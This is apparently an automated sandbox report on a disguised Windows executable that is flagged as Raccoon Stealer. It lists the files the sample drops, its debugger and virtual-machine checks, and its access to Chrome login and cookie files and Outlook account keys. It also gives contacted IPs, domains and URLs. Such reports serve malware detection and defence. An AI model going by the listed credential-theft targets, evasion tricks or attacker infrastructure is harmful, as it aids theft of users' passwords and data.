Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\qipcap.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\lgpllibs.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\mozMapi32_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\ldif60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\prldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\mozMapi32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\breakpadinjector.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\MapiProxy.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\nssckbi.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\AccessibleHandler.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\IA2Marshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\libEGL.dll	Jump to dropped file

Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe

Registry key enumerated: More than 152 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe TID: 6772	Thread sleep count: 193 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 6712	Thread sleep count: 86 > 30			Jump to behavior

Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior

Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.853428201.0000000066C40000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849907601.00000000009A8000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.853428201.0000000066C40000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000002.798629979.000000000076A000.00000004.00000020.sdmp, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849718672.0000000000561000.00000040.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.853428201.0000000066C40000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.853428201.0000000066C40000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK

Jump to behavior

Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Raccoon Stealer

Show sources

Source: Yara match

File source: Process Memory Space: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe PID: 5668, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings	Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Jump to behavior

Remote Access Functionality:

Yara detected Raccoon Stealer

Show sources

Source: Yara match

File source: Process Memory Space: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe PID: 5668, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection11	Masquerading1	OS Credential Dumping1	Security Software Discovery511	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion22	Input Capture1	Process Discovery1	Remote Desktop Protocol	Input Capture1	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection11	Security Account Manager	Virtualization/Sandbox Evasion22	SMB/Windows Admin Shares	Data from Local System1	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol15	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery223	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\AccessibleHandler.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\AccessibleHandler.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\AccessibleMarshal.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\AccessibleMarshal.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\IA2Marshal.dll	3%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\IA2Marshal.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\MapiProxy.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\MapiProxy.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\MapiProxy_InUse.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\MapiProxy_InUse.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l1-2-0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l2-1-0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l2-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-handle-l1-1-0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-handle-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-heap-l1-1-0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-heap-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-interlocked-l1-1-0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-interlocked-l1-1-0.dll	0%	ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
telete.in	9%	Virustotal		Browse
ekocafebali.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0	0%	URL Reputation	safe
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0	0%	URL Reputation	safe
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0	0%	URL Reputation	safe
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignCA.crl0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignCA.crl0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignCA.crl0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignCA.crl0	0%	URL Reputation	safe
http://crl.chambersign.org/chambersroot.crl0	0%	URL Reputation	safe
http://crl.chambersign.org/chambersroot.crl0	0%	URL Reputation	safe
http://crl.chambersign.org/chambersroot.crl0	0%	URL Reputation	safe
http://crl.chambersign.org/chambersroot.crl0	0%	URL Reputation	safe
http://r3.i.lencr.org/0Y	0%	URL Reputation	safe
http://r3.i.lencr.org/0Y	0%	URL Reputation	safe
http://r3.i.lencr.org/0Y	0%	URL Reputation	safe
http://r3.i.lencr.org/0Y	0%	URL Reputation	safe
https://repository.luxtrust.lu0	0%	URL Reputation	safe
https://repository.luxtrust.lu0	0%	URL Reputation	safe
https://repository.luxtrust.lu0	0%	URL Reputation	safe
https://repository.luxtrust.lu0	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersroot.html0	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersroot.html0	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersroot.html0	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersroot.html0	0%	URL Reputation	safe
http://www.mozilla.com0	0%	URL Reputation	safe
http://www.mozilla.com0	0%	URL Reputation	safe
http://www.mozilla.com0	0%	URL Reputation	safe
http://www.mozilla.com0	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://45.139.236.6/q_	0%	Avira URL Cloud	safe
http://crl.securetrust.com/SGCA.crl0	0%	URL Reputation	safe
http://crl.securetrust.com/SGCA.crl0	0%	URL Reputation	safe
http://crl.securetrust.com/SGCA.crl0	0%	URL Reputation	safe
http://45.139.236.6//l/f/7y4Wg3gBuI_ccNKoGwkK/7a6d75ef6f646f4419fc28f58e62a7952e597921er	0%	Avira URL Cloud	safe
http://crl.securetrust.com/STCA.crl0	0%	URL Reputation	safe
http://crl.securetrust.com/STCA.crl0	0%	URL Reputation	safe
http://crl.securetrust.com/STCA.crl0	0%	URL Reputation	safe
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl	0%	URL Reputation	safe
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl	0%	URL Reputation	safe
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl	0%	URL Reputation	safe
http://r3.i.lencr.org/0-	0%	Avira URL Cloud	safe
http://www.certplus.com/CRL/class2.crl0	0%	URL Reputation	safe
http://www.certplus.com/CRL/class2.crl0	0%	URL Reputation	safe
http://www.certplus.com/CRL/class2.crl0	0%	URL Reputation	safe
http://45.139.236.6//l/f/7y4Wg3gBuI_ccNKoGwkK/0a3546e5040ab5a4b3cac44b064a321d51adba4a	0%	Avira URL Cloud	safe
https://ekocafebali.com/wp-content/plugins/vmaxyvefms/back/78893c675eddafbfbda146801a998645182ce2c3_	0%	Avira URL Cloud	safe
http://45.139.236.6/E	0%	Avira URL Cloud	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://45.139.236.6/	0%	Avira URL Cloud	safe
https://ocsp.quovadisoffshore.com0	0%	URL Reputation	safe
https://ocsp.quovadisoffshore.com0	0%	URL Reputation	safe
https://ocsp.quovadisoffshore.com0	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersignroot.html0	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersignroot.html0	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersignroot.html0	0%	URL Reputation	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://policy.camerfirma.com0	0%	URL Reputation	safe
http://policy.camerfirma.com0	0%	URL Reputation	safe
http://policy.camerfirma.com0	0%	URL Reputation	safe
https://telete.in/org/img/t_logo.png	0%	URL Reputation	safe
https://telete.in/org/img/t_logo.png	0%	URL Reputation	safe
https://telete.in/org/img/t_logo.png	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
https://support.google.c	0%	Avira URL Cloud	safe
https://telete.in/yoyodcabane	0%	Avira URL Cloud	safe
http://ocsp.accv.es0	0%	URL Reputation	safe
http://ocsp.accv.es0	0%	URL Reputation	safe
http://ocsp.accv.es0	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
https://ekocafebali.com/wp-content/plugins/vmaxyvefms/main/78893c675eddafbfbda146801a998645182ce2c3_	0%	Avira URL Cloud	safe
https://helpx.a	0%	Avira URL Cloud	safe
http://45.139.236.6//l/f/7y4Wg3gBuI_ccNKoGwkK/7a6d75ef6f646f4419fc28f58e62a7952e597921	0%	Avira URL Cloud	safe
http://45.139.236.6	0%	Avira URL Cloud	safe
https://www.catcert.net/verarrel	0%	URL Reputation	safe
https://www.catcert.net/verarrel	0%	URL Reputation	safe
https://www.catcert.net/verarrel	0%	URL Reputation	safe
http://45.139.236.6/OINT	0%	Avira URL Cloud	safe
http://crl.chambersign.org/chambersignroot.crl0	0%	URL Reputation	safe
http://crl.chambersign.org/chambersignroot.crl0	0%	URL Reputation	safe
http://crl.chambersign.org/chambersignroot.crl0	0%	URL Reputation	safe
http://crl.xrampsecurity.com/XGCA.crl0	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
telete.in	195.201.225.248	true	true	9%, Virustotal, Browse	unknown
ekocafebali.com	111.67.28.15	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://45.139.236.6//l/f/7y4Wg3gBuI_ccNKoGwkK/0a3546e5040ab5a4b3cac44b064a321d51adba4a	false	Avira URL Cloud: safe	unknown
http://45.139.236.6/	false	Avira URL Cloud: safe	unknown
http://45.139.236.6//l/f/7y4Wg3gBuI_ccNKoGwkK/7a6d75ef6f646f4419fc28f58e62a7952e597921	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	RYwTiizs2t.4.dr	false		high
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0	nssckbi.dll.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fedir.comsign.co.il/crl/ComSignCA.crl0	nssckbi.dll.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	RYwTiizs2t.4.dr	false		high
http://crl.chambersign.org/chambersroot.crl0	nssckbi.dll.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
